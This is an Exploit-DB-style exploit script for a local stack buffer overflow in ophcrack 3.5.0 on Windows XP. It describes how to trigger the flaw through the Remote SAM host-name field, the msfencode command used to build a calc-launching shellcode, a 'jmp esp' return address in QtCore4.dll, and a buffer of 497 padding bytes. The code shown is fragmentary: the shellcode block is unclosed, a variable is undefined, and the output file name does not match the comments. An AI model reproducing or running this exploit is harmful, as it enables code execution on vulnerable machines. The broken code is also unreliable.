# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF
# Date: 21.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage:http://ophcrack.sourceforge.net/
# Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-#win32-installer-3.5.0.exe
# Version: 3.5.0
# Tested on: Windows XP SP3 Eng (32bits)
#Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well)
#In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash.
#pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload.
#pwdump6_setup itself doesn't look to be exploitable outside of ophrack.
#Kudos to Hostess for pointing me to #http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html
shellcode = (
#windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c
#!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp espasciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll]
buffer = "A"*497 + jmp + shellcode
file = open('exploit.txt','w')